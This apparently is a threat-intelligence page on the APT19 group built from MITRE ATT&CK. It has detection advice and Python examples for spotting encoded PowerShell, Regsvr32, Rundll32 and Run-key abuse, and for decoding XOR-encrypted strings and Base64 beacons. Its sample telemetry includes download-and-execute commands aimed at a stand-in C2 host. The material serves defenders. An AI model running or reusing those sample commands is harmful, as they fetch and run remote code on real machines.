G0073: APT19
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [1] Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same. [2] [3] [4]
Analyst context for executives and security teams
APT19 is an ATT&CK group entry for a Chinese-based threat group reported to have targeted multiple industries, including defense, finance, energy, pharmaceuticals, telecommunications, high tech, education, manufacturing, and legal services. For leaders, the practical value is not to assume current exposure, but to use the mapped behaviors as a readiness checklist for targeted intrusion scenarios: phishing or drive-by entry, scripted execution, post-exploitation tooling, discovery, persistence, and command-and-control over web protocols.
Executive priority
Prioritize this object where the organization operates in one of the referenced sectors or has high-value legal, investment, intellectual property, regulated, or operational data. The ATT&CK relationships point to controls that often determine resilience against targeted intrusions: email and web initial-access defenses, endpoint visibility for PowerShell and signed Windows utilities, persistence monitoring, and C2 detection over common web traffic. Executives should ask whether SOC and IR teams can prove collection and response coverage for these behaviors rather than relying on group-name blocking or attribution-based assumptions.
Technical view
ATT&CK does not provide a detection section for APT19, so defenders should validate coverage against the related techniques and software instead. Relationship-driven priorities include spearphishing attachments, malicious file execution, drive-by compromise, command and scripting interpreter activity including PowerShell, use of post-exploitation frameworks such as Cobalt Strike and Empire, discovery commands for system/user/network information, registry and service persistence, Run keys/startup folders, DLL abuse, Regsvr32/Rundll32 proxy execution, obfuscation/encoding/deobfuscation, and web-protocol C2. Because the group object has no specified platforms, platform scope should be derived from local assets and the related technique/software platform fields, especially Windows endpoints for PowerShell, registry, services, Regsvr32, Rundll32, and DLL-related behaviors.
Likely telemetry
- Email security logs and message metadata for spearphishing attachment investigations
- Web proxy, DNS, and network security logs for drive-by and web-protocol command-and-control patterns
- Endpoint process creation and command-line telemetry, especially PowerShell and other interpreters
- PowerShell script block/module logging where deployed
- Windows Registry change telemetry for Run keys and other persistence-related modifications
Detection direction
- Do not build coverage around the APT19 name alone; map detections to the related ATT&CK techniques and software relationships.
- Validate alerting for suspicious interpreter usage, encoded or obfuscated command lines, and PowerShell activity that is unusual for the user, host role, or parent process.
- Tune detections for Regsvr32 and Rundll32 to reduce false positives by baselining legitimate administrative and application activity, then alerting on unusual paths, network access, scriptlet-like behavior, or suspicious parent-child process chains where telemetry supports it.
- Correlate initial-access signals such as phishing attachments or suspicious browsing with follow-on execution, discovery, persistence, and outbound web traffic rather than treating each event in isolation.
- Review blind spots in encrypted web traffic inspection, endpoint command-line capture, PowerShell logging, registry auditing, and service-change monitoring.
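The detection points above, turned into something a SOC can run. This is an added example, not code from the page, MITRE or any vendor: heuristic rules for the APT19-mapped behaviors (encoded and hidden-window PowerShell spawned by Office, Regsvr32 pulling a remote scriptlet, Rundll32 loading a DLL from an untrusted path, a Run key pointing at a user-writable location) evaluated over constructed sample events. The event layout and field names (`type`, `image`, `parent`, `cmdline`, `key`, `data`) are assumptions loosely modeled on Sysmon process-create and registry-value-set events; the hostnames, paths and URLs are made up.

```python
"""Added example, not code from the page, MITRE or any vendor: heuristic
detections for the APT19-mapped behaviors, run over constructed sample
telemetry. Event layout and field names are assumptions loosely modeled on
Sysmon process-create and registry-value-set events."""
import base64
import re

PS_NAMES = {"powershell.exe", "pwsh.exe"}
OFFICE_NAMES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# PowerShell accepts unambiguous parameter prefixes, so -e/-ec/-enc all mean
# -EncodedCommand and -w/-win mean -WindowStyle. Requiring a 20+ character
# Base64 run keeps "-ExecutionPolicy Bypass" from matching the encoded rule.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden\b")
SCT_RE = re.compile(r"(?i)/i:\s*https?:|scrobj\.dll")


def basename(path: str) -> str:
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_trusted_dir(path: str) -> bool:
    return path.strip('"').lower().startswith(TRUSTED_DIRS)


def decode_encoded_command(blob: str):
    """-EncodedCommand carries Base64 of UTF-16LE text; None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_process(ev: dict) -> list:
    """Return (technique, rule, detail) tuples for one process-create event."""
    image, parent, cmd = basename(ev["image"]), basename(ev.get("parent", "")), ev["cmdline"]
    hits = []
    if image in PS_NAMES:
        m = ENC_RE.search(cmd)
        if m:
            hits.append(("T1027.010", "powershell_encoded_command",
                         decode_encoded_command(m.group(1)) or "<undecodable>"))
        if HIDDEN_RE.search(cmd):
            hits.append(("T1564.003", "powershell_hidden_window", cmd))
        if parent in OFFICE_NAMES:
            hits.append(("T1204.002", "office_spawned_powershell", parent))
    elif image == "regsvr32.exe" and SCT_RE.search(cmd):
        hits.append(("T1218.010", "regsvr32_remote_scriptlet", cmd))
    elif image == "rundll32.exe":
        # rundll32.exe <dll>,<entry> [args]: flag DLLs loaded from outside trusted dirs
        args = cmd.split(None, 1)[1] if " " in cmd else ""
        dll = args.split(",", 1)[0].strip()
        if dll and not in_trusted_dir(dll):
            hits.append(("T1218.011", "rundll32_untrusted_dll", dll))
    return hits


def detect_registry(ev: dict) -> list:
    """Flag Run/RunOnce values whose target lives outside trusted directories."""
    if "\\currentversion\\run" in ev["key"].lower() and not in_trusted_dir(ev["data"]):
        return [("T1547.001", "run_key_untrusted_target", f"{ev['key']} -> {ev['data']}")]
    return []


def run_detections(events) -> list:
    findings = []
    for ev in events:
        hits = detect_process(ev) if ev["type"] == "process" else detect_registry(ev)
        findings += [{"host": ev["host"], "technique": t, "rule": r, "detail": d} for t, r, d in hits]
    return findings


def _enc(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample telemetry (not real logs); the last three must not fire.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-0421",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -W Hidden -NoP -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')")},
    {"type": "process", "host": "WS-0421", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://c2.example.invalid/x.sct scrobj.dll"},
    {"type": "process", "host": "WS-0421", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\Libraries\upd.dll,Start"},
    {"type": "registry", "host": "WS-0421",
     "key": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\Users\alice\AppData\Local\Temp\upd.exe"},
    {"type": "process", "host": "WS-0421",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"type": "process", "host": "WS-0421", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "registry", "host": "WS-0421",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "data": r"C:\Program Files\Vendor\agent.exe"},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f["technique"], f["rule"], f["detail"][:80])
```

The trusted-directory list is the baseline the bullets ask for; in production it should be replaced by the paths your own software inventory actually uses, and the Run-key rule should additionally compare against a known-good allowlist of value names so vendor agents do not page the SOC. The decoded `-EncodedCommand` text is kept in the finding because the Base64 wrapper alone says nothing about intent; the correlation step in the bullets above is what turns these single hits into an incident.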
Mitigation priorities
- Start with initial-access risk reduction: strengthen email attachment controls, user reporting workflows, and web browsing protections for targeted phishing and drive-by scenarios.
- Harden script and interpreter use with least privilege, constrained administrative access, and policy controls appropriate to the environment.
- Improve endpoint hardening and monitoring for Windows persistence paths, including Registry Run keys, startup folders, and service creation or modification.
- Review allowlisting and application control assumptions for signed Windows utilities such as Regsvr32 and Rundll32, since trusted binaries can be abused.
- Ensure incident response playbooks cover post-exploitation frameworks and include containment steps for hosts showing discovery, persistence, and web-based C2 indicators.
Analyst notes and limits
The official group description cites broad industry targeting and a 2017 phishing campaign against seven law and investment firms. It also notes that some analysts track APT19 and Deep Panda as the same group, but that open-source information is unclear. The related techniques provide more operational value than the sparse group-level fields: they describe a pattern of initial access, execution, stealth, discovery, persistence, and command-and-control behaviors that can be validated defensively without making attribution claims.
MITRE provides no official detection text, no group-level platforms, and no tactics directly on the APT19 object. The recommendations above are derived from supplied ATT&CK relationships and external references only. Local relevance depends on the organization’s sector, exposed users, endpoint and cloud footprint, logging maturity, and whether the listed techniques/software behaviors are observable in the environment.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | An APT19 HTTP malware variant establishes persistence by setting the Registry key |
| Enterprise | T1059.001 | PowerShell | APT19 used PowerShell commands to execute payloads. [1] |
| Enterprise | T1564.003 | Hidden Window | APT19 used |
| Enterprise | T1016 | System Network Configuration Discovery | APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine. [4] |
| Enterprise | T1033 | System Owner/User Discovery | APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username. [4] |
| Enterprise | T1218.011 | Rundll32 | APT19 configured its payload to inject into rundll32.exe. [1] |
| Enterprise | T1112 | Modify Registry | APT19 uses a Port 22 malware variant to modify several Registry keys. [4] |
| Enterprise | T1189 | Drive-by Compromise | APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets. [4] |
| Enterprise | T1543.003 | Windows Service | An APT19 Port 22 malware variant registers itself as a service. [4] |
| Enterprise | T1071.001 | Web Protocols | |
| Enterprise | T1059 | Command and Scripting Interpreter | APT19 downloaded and launched code within a SCT file. [1] |
| Enterprise | T1027.013 | Encrypted/Encoded File | APT19 used Base64 to obfuscate payloads. [1] |
| Enterprise | T1566.001 | Spearphishing Attachment | APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits. [1] |
| Enterprise | T1204.002 | Malicious File | APT19 attempted to get users to launch malicious attachments delivered via spearphishing emails. [1] |
| Enterprise | T1082 | System Information Discovery | |
| Enterprise | T1132.001 | Standard Encoding | An APT19 HTTP malware variant used Base64 to encode communications to the C2 server. [4] |
| Enterprise | T1588.002 | Tool | |
| Enterprise | T1574.001 | DLL | APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL. [4] |
| Enterprise | T1218.010 | Regsvr32 | APT19 used Regsvr32 to bypass application control techniques. [1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | An APT19 HTTP malware variant decrypts strings using single-byte XOR keys. [4] |
| Enterprise | T1027.010 | Command Obfuscation | APT19 used Base64 to obfuscate executed commands. [1] |
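The T1140 and T1132.001 rows describe two encodings an analyst has to undo: single-byte XOR over the malware's strings and Base64 over its C2 traffic. The block below is an added example, not from the page or the cited reports (which do not publish APT19's actual keys or message formats): it brute-forces a single-byte XOR key on a constructed string table by requiring every decoded byte to be printable or NUL and preferring the candidate with the most spaces and lowercase letters, then unwraps a constructed Base64 beacon body. The key `0x5A`, the strings, and the `host|user|mac|ip` beacon layout are assumptions made up for the demonstration; the field list only mirrors what the T1016/T1033 rows say is collected.

```python
"""Added example (not from the page or the cited reports): analyst-side
recovery for the two encodings in the table, single-byte XOR string
encryption (T1140) and Base64-encoded C2 bodies (T1132.001). Key, strings
and beacon layout are constructed assumptions."""
import base64
import string

# Bytes accepted in recovered plaintext: printable ASCII (minus the vertical
# tab and form feed) plus the NUL that terminates C strings in a string table.
ALLOWED = (set(string.printable.encode()) - {0x0B, 0x0C}) | {0x00}
PREFERRED = set(b" \x00" + string.ascii_lowercase.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes):
    """Try all 256 keys. A key survives only if every decoded byte is allowed;
    among survivors, prefer the one yielding the most spaces, NULs and
    lowercase letters. Returns (key, plaintext) or None if nothing survives."""
    best = None
    for key in range(256):
        pt = xor_bytes(blob, key)
        if any(b not in ALLOWED for b in pt):
            continue
        score = sum(b in PREFERRED for b in pt)
        if best is None or score > best[0]:
            best = (score, key, pt)
    return None if best is None else (best[1], best[2])


def split_string_table(pt: bytes) -> list:
    """Split a NUL-terminated string table into its strings."""
    return [s for s in pt.split(b"\x00") if s]


# Constructed sample: three NUL-terminated strings XORed with a made-up key.
SAMPLE_KEY = 0x5A
SAMPLE_STRINGS = [b"http://c2.example.invalid/update.php",
                  b"Mozilla/5.0 (Windows NT 6.1; Trident/7.0)",
                  b"cmd.exe /c whoami"]
SAMPLE_BLOB = xor_bytes(b"\x00".join(SAMPLE_STRINGS) + b"\x00", SAMPLE_KEY)


def decode_beacon(body: str):
    """Assumed beacon layout: Base64 of "host|user|mac|ip" in the HTTP body.
    Returns the fields as a dict, or None if the body is not such a beacon."""
    try:
        fields = base64.b64decode(body, validate=True).decode("ascii").split("|")
    except (ValueError, UnicodeDecodeError):
        return None
    if len(fields) != 4:
        return None
    return dict(zip(("host", "user", "mac", "ip"), fields))


# Constructed beacon body (the MAC and IP are made up).
SAMPLE_BODY = base64.b64encode(b"WS-0421|alice|00:0c:29:ab:cd:ef|10.0.5.17").decode()

if __name__ == "__main__":
    key, pt = recover_xor_key(SAMPLE_BLOB)
    print(f"key=0x{key:02x}", split_string_table(pt))
    print(decode_beacon(SAMPLE_BODY))
```

The hard "every byte allowed" filter is what makes the brute force decisive: with a realistic mix of digits, uppercase, lowercase and NUL separators, only the true key maps every byte into the allowed set, and the preference score only matters for short or low-variety blobs. On the network side, the same decode applied to proxy-logged request bodies is a cheap way to surface hostname-and-username beacons that look like opaque Base64 to a signature engine.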
Groups, software, and campaigns
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
Object version and sync metadata
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.6 | | Current bundle | 9043f41e86b5… |
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] FireEye APT19: Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
- [2] ICIT China's Espionage Jul 2016: Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
- [3] FireEye APT Groups: FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.
- [4] Unit 42 C0d0so0 Jan 2016: Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
- [5] APT19 (Citation: FireEye APT19)
- [6] C0d0so0 (Citation: Unit 42 C0d0so0 Jan 2016)
- [7] Codoso (Citation: Unit 42 C0d0so0 Jan 2016)
- [8] Codoso Team (Citation: FireEye APT Groups)
- [9] Dark Reading Codoso Feb 2015: Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.
- [10] Sunshop Group (Citation: Dark Reading Codoso Feb 2015)
- [11] mitre-attack G0073
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.